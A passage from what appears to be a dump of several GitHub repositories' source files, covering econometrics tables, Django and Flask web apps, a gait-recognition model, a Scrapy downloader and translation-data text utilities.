"dca11","dca12","dca13","dca14","dca15"]
cluster_var = 'codccaa'
results = mt.ivreg(df_h, y, E, Z, X, cluster=cluster_var,addcons=True)
return(results)
def table_alternative_alignment(data, data2):
table = pd.DataFrame({'LATE': [], 'SE(1)': [], 'P-val(1)': [],
'HLATE(Align*RSM)': [], 'SE(2)': [], 'P-val(2)': [],
'RSM': [], 'SE(3)': [], 'P-val(3)': [], 'Bandwidth':[],
'Obs' : []})
case = ('Alignment','Partner-Align','Bloc-Align')
table['RD'] = case
table = table.set_index('RD')
# The First row shows the estimates of original alignment dummy
align1 = second_stage_2SLS_local(data, bandwidth = 0.193, cluster_var = "codiine", covariates = 0)
align2 = effect_of_competition_local(data2, bandwidth = 0.193)
result_align = [align1.beta['ab'] , align1.se['ab'], align1.pt['ab'],
align2.beta['esas1'], align2.se['esas1'], align2.pt['esas1'],
align2.beta['ecs1'], align2.se['ecs1'], align2.pt['ecs1'], 0.193, align2.N]
table.loc['Alignment'] = result_align
# The second row shows the estimates of partner-alignment dummy
part1 = LATE_for_alternative_align(data,bandwidth = 0.225 ,endo = ['abcd', 'vsbcd'],cluster_var = 'codiine')
part2 = HLATE_for_alternative_align(data,bandwidth = 0.225, alter = 'part')
result_part = [part1.beta['abcd'] , part1.se['abcd'], part1.pt['abcd'],
part2.beta['esas1_bis'], part2.se['esas1_bis'], part2.pt['esas1_bis'],
part2.beta['ecs1'], part2.se['ecs1'], part2.pt['ecs1'], 0.225, part2.N]
table.loc['Partner-Align'] = result_part
# The third row shows the estimates of bloc-alignment dummy
bloc1 = LATE_for_alternative_align(data,bandwidth = 0.219 ,endo = ['bloc', 'vsbloc'],cluster_var = 'codiine')
bloc2 = HLATE_for_alternative_align(data,bandwidth = 0.219, alter = 'bloc')
result_bloc = [bloc1.beta['bloc'] , bloc1.se['bloc'], bloc1.pt['bloc'],
bloc2.beta['esas1_bisbis'], bloc2.se['esas1_bisbis'], bloc2.pt['esas1_bisbis'],
bloc2.beta['ecs1'], bloc2.se['ecs1'], bloc2.pt['ecs1'], 0.219, bloc2.N]
table.loc['Bloc-Align'] = result_bloc
return table
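# Usage sketch (comments only; assumptions: `data`/`data2` are the pandas DataFrames
# prepared earlier in this module with the columns referenced above, and `mt` is
# presumably econtools.metrics, imported at the top of the file):
# balance = Balance_test_table(data) # covariate balance around the alignment threshold
# poly = table_Poly_Robust(data, bandwidth=1) # robustness to the polynomial order
# late = robust_bandwidth_LATE(data) # LATE across alternative bandwidths
# alt = table_alternative_alignment(data, data2) # alternative alignment definitions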
``` |
{
"source": "jinka/Inst-Photo-App",
"score": 2
} |
#### File: Inst-Photo-App/insta/models.py
```python
from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
from django.urls import reverse
class Image(models.Model):
image=models.ImageField(upload_to = '')
name=models.CharField(max_length=100)
caption=models.CharField(max_length=100)
date_created=models.DateTimeField(default=timezone.now)
likes=models.IntegerField(default=0)
user = models.ForeignKey(User, on_delete=models.CASCADE)
class Meta:
ordering = ['name']
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse('insta-detail',kwargs={'pk': self.pk})
def save_image(self):
self.save()
def delete_image(self):
self.delete()
@classmethod
def update_caption(cls, id, caption):
cls.objects.filter(id=id).update(caption=caption)
```
#### File: Inst-Photo-App/users/views.py
```python
from django.shortcuts import render, redirect, get_object_or_404
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from .forms import UserRegisterForm, UserUpdateForm, ProfileUpdateForm
from insta.models import Image
from decouple import config
from django.core.mail import send_mail
from django.conf import settings
def email(request):
pass
return redirect('redirect to a new page')
def register(request):
if request.method == 'POST':
form = UserRegisterForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get('username')
subject = 'Thank you for registering to our site'
message = ' it means a world to us '
email_from = settings.EMAIL_HOST_USER
recipient_list = ['<EMAIL>',settings.EMAIL_HOST_USER]
send_mail( subject, message, email_from, recipient_list )
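# Note: send_mail relies on the SMTP configuration in settings.py
# (EMAIL_HOST, EMAIL_PORT, EMAIL_HOST_USER, EMAIL_HOST_PASSWORD, EMAIL_USE_TLS).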
messages.success(request, f'Your account has been created! You are now able to log in')
return redirect('login')
else:
form = UserRegisterForm()
return render(request, 'users/register.html', {'form': form})
@login_required
def profile(request):
current_user = request.user
images = Image.objects.filter(user = current_user)
if request.method == 'POST':
u_form = UserUpdateForm(request.POST, instance=request.user)
p_form = ProfileUpdateForm(request.POST,
request.FILES,
instance=request.user.profile)
if u_form.is_valid() and p_form.is_valid():
u_form.save()
p_form.save()
messages.success(request, f'Your account has been updated!')
return redirect('profile')
else:
u_form = UserUpdateForm(instance=request.user)
p_form = ProfileUpdateForm(instance=request.user.profile)
context = {
'u_form': u_form,
'p_form': p_form,
'images': images
}
return render(request, 'users/profile.html', context)
``` |
{
"source": "JinkaiZheng/TraND",
"score": 3
} |
#### File: model/network/basic_blocks.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
class BasicConv2d(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, **kwargs):
super(BasicConv2d, self).__init__()
self.conv = nn.Conv2d(in_channels, out_channels, kernel_size, bias=False, **kwargs)
def forward(self, x):
x = self.conv(x)
return F.leaky_relu(x, inplace=True)
class SetBlock(nn.Module):
def __init__(self, forward_block, pooling=False):
super(SetBlock, self).__init__()
self.forward_block = forward_block
self.pooling = pooling
if pooling:
self.pool2d = nn.MaxPool2d(2)
def forward(self, x):
n, s, c, h, w = x.size()
x = self.forward_block(x.view(-1,c,h,w))
if self.pooling:
x = self.pool2d(x)
_, c, h, w = x.size()
return x.view(n, s, c, h ,w)
class HPM(nn.Module):
def __init__(self, in_dim, out_dim, bin_level_num=5):
super(HPM, self).__init__()
self.bin_num = [2**i for i in range(bin_level_num)]
self.fc_bin = nn.ParameterList([
nn.Parameter(
nn.init.xavier_uniform(
torch.zeros(sum(self.bin_num), in_dim, out_dim)))])
def forward(self, x):
feature = list()
n, c, h, w = x.size()
for num_bin in self.bin_num:
z = x.view(n, c, num_bin, -1)
z = z.mean(3)+z.max(3)[0]
feature.append(z)
feature = torch.cat(feature, 2).permute(2, 0, 1).contiguous()
feature = feature.matmul(self.fc_bin[0])
return feature.permute(1, 0, 2).contiguous()
```
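A minimal shape-check sketch for the blocks above. The input sizes, channel widths and the plain max-over-frames set pooling are illustrative assumptions, not values taken from this repository's configuration:
```python
import torch

silhouettes = torch.randn(2, 30, 1, 64, 44)              # (batch, frames, channel, H, W)
conv = SetBlock(BasicConv2d(1, 32, 5, padding=2), pooling=True)
feats = conv(silhouettes)                                 # -> (2, 30, 32, 32, 22)
set_feat = feats.max(1)[0]                                # naive set pooling over frames
hpm = HPM(in_dim=32, out_dim=256)                         # bins [1, 2, 4, 8, 16] -> 31 strips
out = hpm(set_feat)                                       # -> (2, 31, 256)
print(out.shape)
```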
#### File: model/utils/data_set.py
```python
import torch.utils.data as tordata
import numpy as np
import os.path as osp
import os
import cv2
import xarray as xr
class DataSet(tordata.Dataset):
def __init__(self, seq_dir, label, seq_type, view, cache, resolution):
self.seq_dir = seq_dir
self.view = view
self.seq_type = seq_type
self.label = label
self.cache = cache
self.resolution = int(resolution)
self.cut_padding = int(float(resolution)/64*10)
self.data_size = len(self.label)
self.data = [None] * self.data_size
self.frame_set = [None] * self.data_size
self.label_set = set(self.label)
self.seq_type_set = set(self.seq_type)
self.view_set = set(self.view)
_ = np.zeros((len(self.label_set),
len(self.seq_type_set),
len(self.view_set))).astype('int')
_ -= 1
self.index_dict = xr.DataArray(
_,
coords={'label': sorted(list(self.label_set)),
'seq_type': sorted(list(self.seq_type_set)),
'view': sorted(list(self.view_set))},
dims=['label', 'seq_type', 'view'])
for i in range(self.data_size):
_label = self.label[i]
_seq_type = self.seq_type[i]
_view = self.view[i]
self.index_dict.loc[_label, _seq_type, _view] = i
def load_all_data(self):
for i in range(self.data_size):
self.load_data(i)
def load_data(self, index):
return self.__getitem__(index)
def __loader__(self, path):
return self.img2xarray(
path)[:, :, self.cut_padding:-self.cut_padding].astype(
'float32') / 255.0
def __getitem__(self, index):
# pose sequence sampling
if not self.cache:
data = [self.__loader__(_path) for _path in self.seq_dir[index]]
frame_set = [set(feature.coords['frame'].values.tolist()) for feature in data]
frame_set = list(set.intersection(*frame_set))
elif self.data[index] is None:
data = [self.__loader__(_path) for _path in self.seq_dir[index]]
frame_set = [set(feature.coords['frame'].values.tolist()) for feature in data]
frame_set = list(set.intersection(*frame_set))
self.data[index] = data
self.frame_set[index] = frame_set
else:
data = self.data[index]
frame_set = self.frame_set[index]
return data, frame_set, self.view[index], self.seq_type[index], self.label[index], index
def img2xarray(self, file_path):
imgs = sorted(list(os.listdir(file_path)))
frame_list = [np.reshape(
cv2.imread(osp.join(file_path, _img_path)),
[self.resolution, self.resolution, -1])[:, :, 0]
for _img_path in imgs
if osp.isfile(osp.join(file_path, _img_path))]
num_list = list(range(len(frame_list)))
data_dict = xr.DataArray(
frame_list,
coords={'frame': num_list},
dims=['frame', 'img_y', 'img_x'],
)
return data_dict
def __len__(self):
return len(self.label)
```
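The least obvious part of `DataSet.__init__` is the (label, seq_type, view) → sample-index lookup; a tiny self-contained illustration of the same xarray pattern (the label/type/view values below are made up):
```python
import numpy as np
import xarray as xr

labels, seq_types, views = ['001', '002'], ['nm-01', 'nm-02'], ['000', '090']
index = xr.DataArray(
    -np.ones((len(labels), len(seq_types), len(views)), dtype=int),
    coords={'label': labels, 'seq_type': seq_types, 'view': views},
    dims=['label', 'seq_type', 'view'])
index.loc['002', 'nm-01', '090'] = 7              # sample 7 lives at this coordinate
print(int(index.loc['002', 'nm-01', '090']))      # 7
print(int(index.loc['001', 'nm-02', '000']))      # -1 means "no such sequence"
```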
#### File: TraND/GaitSet/test.py
```python
from datetime import datetime
import numpy as np
import argparse
from model.initialization import initialization
from model.utils import evaluation
from config import conf_CASIA, conf_OULP
def boolean_string(s):
if s.upper() not in {'FALSE', 'TRUE'}:
raise ValueError('Not a valid boolean string')
return s.upper() == 'TRUE'
parser = argparse.ArgumentParser(description='Test')
parser.add_argument('--data', default='casia-b', type=str,
help='dataset to be used. (default: casia-b)')
parser.add_argument('--iter', default='100000', type=int,
help='iter: iteration of the checkpoint to load. Default: 100000')
parser.add_argument('--batch_size', default='64', type=int,
help='batch_size: batch size for parallel test. Default: 64')
parser.add_argument('--cache', default=False, type=boolean_string,
help='cache: if set as TRUE all the test data will be loaded at once'
' before the transforming start. Default: FALSE')
opt = parser.parse_args()
# Exclude identical-view cases
def de_diag(acc, each_angle=False):
result = np.sum(acc - np.diag(np.diag(acc)), 1)
result = result / (result.shape[0]-1.0)
if not each_angle:
result = np.mean(result)
return result
if opt.data == "casia-b":
conf = conf_CASIA
elif opt.data == "oulp":
conf = conf_OULP
else:
raise ValueError("Please check your dataset name; it must be either casia-b or oulp.")
m = initialization(conf, test=opt.cache)[0]
# load model checkpoint of iteration opt.iter
print('Loading the model of iteration %d...' % opt.iter)
m.load(opt.iter)
print('Transforming...')
time = datetime.now()
test = m.transform('test', opt.batch_size)
print('Evaluating...')
acc = evaluation(test, conf['data'])
print('Evaluation complete. Cost:', datetime.now() - time)
if acc.shape[0] == 3:
for i in range(1):
print('===Rank-%d (Include identical-view cases) on the CASIA-B dataset===' % (i + 1))
print('NM: %.3f,\tBG: %.3f,\tCL: %.3f' % (
np.mean(acc[0, :, :, i]),
np.mean(acc[1, :, :, i]),
np.mean(acc[2, :, :, i])))
for i in range(1):
print('===Rank-%d (Exclude identical-view cases) on the CASIA-B dataset===' % (i + 1))
print('NM: %.3f,\tBG: %.3f,\tCL: %.3f' % (
de_diag(acc[0, :, :, i]),
de_diag(acc[1, :, :, i]),
de_diag(acc[2, :, :, i])))
np.set_printoptions(precision=2, floatmode='fixed')
for i in range(1):
print('===Rank-%d of each angle (Exclude identical-view cases) on the CASIA-B dataset===' % (i + 1))
print('NM:', de_diag(acc[0, :, :, i], True))
print('BG:', de_diag(acc[1, :, :, i], True))
print('CL:', de_diag(acc[2, :, :, i], True))
elif acc.shape[0] == 1:
for i in range(1):
print('===Rank-%d (Include identical-view cases) on the OULP dataset===' % (i + 1))
print('NM: %.3f' % (
np.mean(acc[0, :, :, i])))
for i in range(1):
print('===Rank-%d (Exclude identical-view cases) on the OULP dataset===' % (i + 1))
print('NM: %.3f' % (
de_diag(acc[0, :, :, i])))
np.set_printoptions(precision=2, floatmode='fixed')
for i in range(1):
print('===Rank-%d of each angle (Exclude identical-view cases) on the OULP dataset===' % (i + 1))
print('NM:', de_diag(acc[0, :, :, i], True))
```
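A quick numeric check of `de_diag` with a made-up 3-view rank-1 accuracy matrix; it assumes `de_diag` from the file above is already defined in the session:
```python
import numpy as np

acc = np.array([[90.0, 70.0, 60.0],
                [70.0, 95.0, 65.0],
                [60.0, 65.0, 88.0]])      # rows: probe view, cols: gallery view (made up)
print(de_diag(acc))                       # mean over cross-view cells only -> 65.0
print(de_diag(acc, each_angle=True))      # per-probe-view means -> [65.  67.5 62.5]
```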
#### File: JinkaiZheng/TraND/logger.py
```python
import logging
import os
from configs import parser_argument
cfg = parser_argument()
class Logger:
def __init__(self, name=__name__):
self.__name = name
self.logger = logging.getLogger(self.__name)
self.logger.setLevel(logging.DEBUG)
log_path = os.path.join('outputs/TraND', cfg.log_name)
if not os.path.exists(log_path): os.makedirs(log_path)
logname = log_path + '/' + cfg.log_name + '.log'
fh = logging.FileHandler(logname, mode='w', encoding='utf-8')
fh.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('[%(asctime)s] [%(levelname)s] %(message)s')
fh.setFormatter(formatter)
ch.setFormatter(formatter)
self.logger.addHandler(fh)
self.logger.addHandler(ch)
@property
def get_log(self):
return self.logger
log = Logger(__name__).get_log
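# Typical usage elsewhere in the project:
# from logger import log
# log.info("message") # goes to stderr and to outputs/TraND/<log_name>/<log_name>.log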
``` |
{
"source": "jinka/like_awwards",
"score": 2
} |
#### File: like_awwards/awwardsapp/models.py
```python
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
import datetime as dt
from django.utils import timezone
from django.urls import reverse
from PIL import Image
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
image = models.ImageField(default='default.jpg',upload_to='profile_pics')
bio = models.TextField(max_length=100, blank=True)
contact = models.TextField(max_length=100, blank=True)
# votes = models.IntegerField(default = 0)
def __str__(self):
return f'{self.user.username} Profile'
def save(self, *args, **kwargs):
super().save(*args, **kwargs)
@classmethod
def filter_by_id(cls, id):
details = Profile.objects.filter(user = id).first()
return details
class Project(models.Model):
image = models.ImageField(upload_to = 'images/')
title = models.CharField(max_length =100)
url = models.CharField(max_length =80)
detail_desciption=models.TextField(max_length=100)
created_date = models.DateTimeField(default=timezone.now)
user = models.ForeignKey(User, on_delete=models.CASCADE)
def __str__(self):
return self.title
def get_absolute_url(self):
return reverse('project-detail', kwargs={'pk': self.pk})
class Meta:
ordering = ['-pk']
def save_project(self):
self.save()
@classmethod
def search_by_projectname(cls,idea):
projects = cls.objects.filter(title__icontains=idea)
return projects
class Rate(models.Model):
pass
# design = models.IntegerField()
# usability = models.IntegerField()
# creativity = models.IntegerField()
# def __str__(self):
# return self.design
# class Meta:
# ordering = ['-id']
# def save_rate(self):
# self.save()
# @classmethod
# def get_rate(cls, profile):
# rate = Rate.objects.filter(Profile__pk = profile)
# return rate
# @classmethod
# def get_all_rating(cls):
# rating = Rate.objects.all()
# return rating
``` |
{
"source": "jinka/News-Highligh",
"score": 3
} |
#### File: app/main/views.py
```python
from flask import render_template,request,redirect,url_for
from . import main
# from app import app
from ..request import get_sources,get_articles,search_article
from ..models import Sources
# Views
@main.route('/')
def index():
'''
view root page function that returns the index the page and its data
'''
sources = get_sources('business')
sports_sources = get_sources('sports')
technology_sources = get_sources('technology')
entertainment_sources = get_sources('entertainment')
title = "News Highlighter"
search_movie = request.args.get('movie_query')
if search_movie:
return redirect(url_for('.search',movie_name=search_movie))
else:
return render_template('index.html',title = title, sources = sources,sports_sources = sports_sources,technology_sources = technology_sources,entertainment_sources = entertainment_sources)
@main.route('/sources/<id>')
def articles(id):
'''
view articles page
'''
articles = get_articles(id)
title = f'NH | {id}'
return render_template('articles.html',title= title,articles = articles)
@main.route('/search/<movie_name>')
def search(movie_name):
'''
View function to display the search results
'''
article_name_list = movie_name.split(" ")
article_name_format = "+".join(article_name_list)
searched_articles = search_article(article_name_format)
title = f'search results for {movie_name}'
return render_template('search.html',title = title,articles = searched_articles)
``` |
{
"source": "jinkanhq/ningen",
"score": 2
} |
#### File: interview/templatetags/markdown.py
```python
from django import template
from django.utils.safestring import mark_safe
from ningen.interview.utils import ningen_markdown as md
register = template.Library()
@register.filter
def markdown(value):
return mark_safe(md.convert(value))
```
#### File: ningen/interview/utils.py
```python
import markdown as md
from markdown.extensions import Extension
from markdown.inlinepatterns import Pattern
from markdown.util import etree
from ningen.interview.models import Item
# 老式链接 [Item Name][item-slug]
OLD_ITEM_LINK_RE = r'\[([^\[\]\(\)]+)\]\[([^\[\]\(\)]+)\]'
# 新式链接 [[item-slug]]
ITEM_LINK_RE = r'\[\[([a-z0-9\-^\[\]\(\)]+)\]\]'
class OldItemLinkPattern(Pattern):
def handleMatch(self, m):
el = etree.Element("a")
item_slug = m.group(3)
item_name = m.group(2)
el.set('target', '_blank')
el.set('class', 'item')
el.text = item_name
try:
item = Item.objects.get(slug=item_slug)
el.set("href", item.link)
el.set("title", item.get_full_name())
except Item.DoesNotExist:
Item.objects.create(
slug=item_slug, name=item_name, vendor='Unknown',
description='(Markdown generated)', link='javascript:;')
el.set("href", "#")
return el
class ItemLinkPattern(Pattern):
def handleMatch(self, m):
el = etree.Element("a")
el.set('target', '_blank')
el.set('class', 'item')
item_slug = m.group(2)
try:
item = Item.objects.get(slug=item_slug)
el.text = item.get_full_name()
el.set("href", item.link)
el.set("title", item.get_full_name())
except Item.DoesNotExist:
Item.objects.create(
slug=item_slug, name=item_slug, vendor='Unknown',
description='(Markdown generated)', link='javascript:;')
el.set("href", "#")
return el
class NingenExtension(Extension):
def extendMarkdown(self, md, md_globals):
md.inlinePatterns.add(
'itemlink_old', OldItemLinkPattern(OLD_ITEM_LINK_RE, md), '<reference')
md.inlinePatterns.add(
'itemlink', ItemLinkPattern(ITEM_LINK_RE, md), '<reference'
)
ningen_markdown = md.Markdown(extensions=[NingenExtension()])
``` |
{
"source": "jinka/One-Minute_Pitch",
"score": 2
} |
#### File: migrations/versions/ba2c8c2959e3_initial_migration.py
```python
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = 'ba2c8c2959e3'
down_revision = '<PASSWORD>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('comments')
op.drop_table('pitches')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('pitches',
sa.Column('id', sa.INTEGER(), server_default=sa.text("nextval('pitches_id_seq'::regclass)"), autoincrement=True, nullable=False),
sa.Column('pitch_title', sa.VARCHAR(), autoincrement=False, nullable=True),
sa.Column('posted', postgresql.TIMESTAMP(), autoincrement=False, nullable=True),
sa.Column('author', sa.INTEGER(), autoincrement=False, nullable=True),
sa.Column('category', sa.VARCHAR(), autoincrement=False, nullable=True),
sa.Column('content', sa.VARCHAR(), autoincrement=False, nullable=True),
sa.ForeignKeyConstraint(['author'], ['users.id'], name='pitches_author_fkey'),
sa.PrimaryKeyConstraint('id', name='pitches_pkey'),
postgresql_ignore_search_path=False
)
op.create_table('comments',
sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False),
sa.Column('comment_content', sa.VARCHAR(), autoincrement=False, nullable=True),
sa.Column('user_id', sa.INTEGER(), autoincrement=False, nullable=True),
sa.Column('pitch_id', sa.INTEGER(), autoincrement=False, nullable=True),
sa.ForeignKeyConstraint(['pitch_id'], ['pitches.id'], name='comments_pitch_id_fkey'),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], name='comments_user_id_fkey'),
sa.PrimaryKeyConstraint('id', name='comments_pkey')
)
# ### end Alembic commands ###
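# These functions are applied by the migration tooling rather than called directly,
# e.g. `alembic upgrade head` / `alembic downgrade -1` (or Flask-Migrate's `flask db upgrade`).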
``` |
{
"source": "JINKEHE/VitalSpider",
"score": 3
} |
#### File: VitalSpider/tutorial/mydownloader.py
```python
import subprocess
import scrapy
class MyDownloader(object):
def process_request(self, request, spider):
if request.url.endswith(".zip"):
subprocess.Popen(["wget", request.url, "-P", "~/temp"])
return scrapy.http.HtmlResponse(url="", body="", encoding='utf8')
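# To enable this middleware, register it in the Scrapy project's settings.py;
# the module path below is an assumption based on this file's location:
#
# DOWNLOADER_MIDDLEWARES = {
#     'tutorial.mydownloader.MyDownloader': 543,
# }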
``` |
{
"source": "JinkelaCrops/t2t-learning",
"score": 3
} |
#### File: t2t-learning/mytrain/my_unpack.py
```python
from processutils.textfilter import Unpack
from utils.simplelog import Logger
import argparse
parser = argparse.ArgumentParser(description="my_unpack")
parser.add_argument('-f', "--file_prefix", required=True)
parser.add_argument('-sep', "--separator", required=True)
# args = parser.parse_args([
# "-f", "../test/medicine.sample.data/data.test",
# "-sep", ' ||| '
# ])
args = parser.parse_args()
args.output_src = args.file_prefix + ".src"
args.output_tgt = args.file_prefix + ".tgt"
log = Logger("my_filter", "my_filter.log").log()
def main(data):
unpack = Unpack(args.separator)
src_lines = []
tgt_lines = []
for k, line in enumerate(data):
try:
src, tgt, change_order = unpack.unpack(line)
except Exception as e:
log.error(f"unpack error: {e.__class__}, {e.__context__}, ### {line.strip()}")
continue
src_lines.append(src + "\n")
tgt_lines.append(tgt + "\n")
return src_lines, tgt_lines
if __name__ == '__main__':
with open(args.file_prefix, "r", encoding="utf8") as f:
data = f.readlines()
src_lines, tgt_lines = main(data)
with open(args.output_src, "w", encoding="utf8") as f:
f.writelines(src_lines)
with open(args.output_tgt, "w", encoding="utf8") as f:
f.writelines(tgt_lines)
```
#### File: t2t-learning/processutils/analyze_dev.py
```python
import re
from processutils.regexutils import pattern_find_pts
from processutils.regexutils import mask_update
class Field(object):
def __init__(self, line):
self.line = line
self.mask = [0] * len(self.line)
class Rule(object):
def __init__(self):
self.id = 0
self.desc = "This is a rule"
self.level = 0
self.regex = ""
def process(self, field: Field):
output = None
if self.regex:
output = pattern_find_pts(self.regex, field.line, mask=field.mask)
mask_update(field.mask, output)
return output
class Check(object):
pass
class Modify(object):
def __init__(self):
pass
class Link(Rule):
def __init__(self):
super().__init__()
self.desc = "TTTLink"
self.regex = "(?:(?:ht|f)tps?://[\\w+\\-]+|www\\.)[\\w\\-\\.,@\\?=%&:;/~\\+#]+/?"
assert re.fullmatch(self.regex, "http://dswd.com")
class Email(Rule):
def __init__(self):
super().__init__()
self.desc = "TTTEmail"
self.regex = "[\\w\\-]+@[\\w\\-]+(?:\\.[\\w\\-]+)+"
assert re.fullmatch(self.regex, "<EMAIL>")
class Numeric(Rule):
def __init__(self):
super().__init__()
self.desc = "TTTNumeric"
self.regex = "\\b[0-9][0-9 ]*(\\.[0-9 ]*[0-9]+)?\\b"
assert re.search(self.regex, "ewe 6 0. 9 0%单位")
def process(self, field: Field):
output = pattern_find_pts(self.regex, field.line, flags=re.A.value, mask=field.mask)
mask_update(field.mask, output)
# sub with self.desc
region_tmp = [k for j in sorted([j for i, pti in output.items() for j in pti]) for k in j]
region_tmp = [0] + region_tmp + [len(field.line)]
region = _flatten_region_to_region(region_tmp, strip=False)
output_list = []
for k, region_k in enumerate(region):
if k < len(region) - 1:
output_list.append(field.line[region_k[0]:region_k[1]])
output_list.append(self.desc)
output_list.append(field.line[region[-1][0]:region[-1][1]])
field.line = " ".join(output_list)
return output
class UpperChemical(Numeric):
def __init__(self):
super().__init__()
self.desc = "TTTUpperChemical"
self.regex = "\\b[0-9]*(?:[a-z]*(?:[A-Z]+[a-z]*)+[0-9]+)+[A-Za-z]*\\b|" \
"\\b[A-Za-z]*(?:[0-9]+[a-z]*(?:[A-Z]+[a-z]*)+)+[0-9]*\\b"
assert re.search(self.regex, "ewe DIsH77st单位", re.A)
# TODO: "2-[(4-methyl-2-nitrophenyl)diazenyl]-3-oxo-N-phenyl-butanamide(MNPDOPBA)"
field = Field("http://www.baidu.666.com H1E2 6 0. 9 0%单位988")
Modify.Link().process(field)
Modify.Email().process(field)
Modify.Numeric().process(field)
Modify.UpperChemical().process(field)
class Filter:
pass
class RePattern(object):
@staticmethod
def regex_between_enzh(regex):
return f"\\b{regex}(?=[\\u4e00-\\u9fff]|\\b)|(?<=[\\u4e00-\\u9fff]){regex}(?=[\\u4e00-\\u9fff]|\\b)"
class TokenRegexProcess(object):
regex = " "
@classmethod
def process(cls, sent):
# TODO: SubwordTextEncoder, and the paper with group sub
matcher = re.finditer(cls.regex, sent)
pattern = [0]
for k, m in enumerate(matcher):
pattern.append(m.span())
pattern.append(len(sent))
if len(pattern) >= 2 and pattern[0] == pattern[1]:
pattern.pop(0)
pattern.pop(0)
if len(pattern) >= 2 and pattern[-1] == pattern[-2]:
pattern.pop(-1)
pattern.pop(-1)
return pattern
class TokenSubProcess(object):
level = 1
sub_dict = {" ": " "}
rep = "\\u0000"
@classmethod
def process(cls, sent):
pattern = []
for src_wd, tgt_wd in cls.sub_dict.items():
matcher = re.finditer(re.escape(src_wd), sent)
pattern = []
for k, m in enumerate(matcher):
pattern.append(m.span())
return pattern
class Token(object):
def __init__(self):
self.level_map = {}
self.level_map = self.get_token_level
@property
def get_token_name(self):
# bad
return ["PercentDecimal", "PercentInteger", "NumericDecimal", "NumericInteger", "NumericYear", "TermUpperCase",
"TermCamelCase", "TermEnCharWithNum", "TermChemicalPrefix"]
@property
def get_token_level(self):
if len(self.level_map) == 0:
for token_name in self.get_token_name:
token = getattr(self, token_name)
token_level = token.level
self.level_map[token_name] = token_level
return self.level_map
def set_token_level(self, level_map_part):
for token_name, token_level in level_map_part.items():
self.level_map[token_name] = token_level
class Link(TokenRegexProcess):
regex = "(?:(?:ht|f)tps?://[\w+\-]+|www\.)[\w\-\.,@\?=%&:;/~\+#]+/?"
assert re.search("^" + regex + "$", "http://dswd.com") is not None
class Email(TokenRegexProcess):
regex = "[\w\-]+@[\w\-]+(?:\.[\w\-]+)+"
assert re.search("^" + regex + "$", "<EMAIL>") is not None
class PercentNumeric(TokenRegexProcess):
regex = "(?<=[\\u4000-\\u9fff ])[0-9][0-9 ]*(\.[0-9 ]*[0-9]+)? *[%‰‱]?(?=[\\u4000-\\u9fff ])"
assert re.search(regex, "ewe 6 0. 9 0%单位")
class Numeric(TokenRegexProcess):
regex = "(?<=[\\u4000-\\u9fff ])[0-9][0-9 ]*(\.[0-9 ]*[0-9]+)?(?=[\\u4000-\\u9fff ])"
assert re.search(regex, "ewe 6 0. 9 0单位")
class PercentInteger(TokenRegexProcess):
level = 0.9
"""100%,必须是整数,允许空格"""
regex = "[0-9][0-9 ]* *%"
rep = "PercentInteger"
class NumericDecimal(TokenRegexProcess):
level = 1
"""55.55"""
regex = "[0-9][0-9 ]*\.[0-9 ]*[0-9]"
rep = "NumericDecimal"
class NumericInteger(TokenRegexProcess):
level = 0
"""5"""
regex = "[0-9][0-9 ]*[0-9]|[0-9]"
rep = "NumericInteger"
class NumericYear(TokenRegexProcess):
level = 0.9
"""2009"""
regex = RePattern.regex_between_enzh("1[5-9][0-9]{2}") + '|' + RePattern.regex_between_enzh("20[0-9]{2}")
rep = "NumericYear"
class TermUpperCase(TokenRegexProcess):
level = 0.2
"""DNA"""
regex = RePattern.regex_between_enzh("[A-Z]+")
rep = "TermUpperCase"
class TermCamelCase(TokenRegexProcess):
level = 0.1
"""pH,PubMed, LoL, but not DNA, ID"""
regex = RePattern.regex_between_enzh("[A-Za-z]+[A-Z]+[A-Za-z]*")
rep = "TermCamelCase"
class TermEnCharWithNum(TokenRegexProcess):
level = 0.3
"""EP2"""
regex = RePattern.regex_between_enzh("[0-9]+[A-Za-z]+[0-9A-Za-z]*") + "|" + RePattern.regex_between_enzh(
"[0-9A-Za-z]*[A-Za-z]+[0-9]+")
rep = "TermEnCharWithNum"
class TermChemicalPrefix(TokenRegexProcess):
level = 0.3
"""1,3,7-"""
regex = "(?<![\w\-])([0-9]+ *[,,] *)*[0-9]+\-(?=[A-Za-z\\u4e00-\\u9fff])"
rep = "TermChemicalPrefix"
class RomanNum(TokenSubProcess):
level = 1
"""Ⅱ"""
sub_dict = {" ": " "}
rep = "RomanNum"
class SentTokenInfo(object):
def __init__(self, sent):
self.sent = sent
# self.token_dict = {}
self.level_dict = {}
self.pos_dict = {}
self.filter_piece = []
self.filter_pos_dict = {}
self.result = ""
self.sub_order_dict = []
@staticmethod
def sub_space(targets):
return [re.sub(" ", "", target) for target in targets]
@staticmethod
def max_length_subpiece(piece_level_dict):
"""
pos:[(1,2), (3,4), (1,4)] and level:[2, 2, 1] -> [(1,4)]
pos:[(2,4), (3,5), (5,8)] and level:[1, 2, 1] -> [(3,5), (5,8)]
"""
piece_keys = sorted(piece_level_dict.keys())
if len(piece_keys) == 0:
return []
filter_piece_tmp = []
__ = 0
his_ = 0
for _, i in enumerate(piece_keys):
if (_ <= his_ + __) and (_ > 0):
continue
__ = 0
li = piece_level_dict[i]
tmp = (i, li)
for j in piece_keys:
lj = piece_level_dict[j]
if tmp[0] == j:
pass
elif ((tmp[0][0] < j[0]) and (tmp[0][1] >= j[1])) or ((tmp[0][0] <= j[0]) and (tmp[0][1] > j[1])):
tmp = tmp
__ += 1
elif ((tmp[0][0] >= j[0]) and (tmp[0][1] < j[1])) or ((tmp[0][0] > j[0]) and (tmp[0][1] <= j[1])):
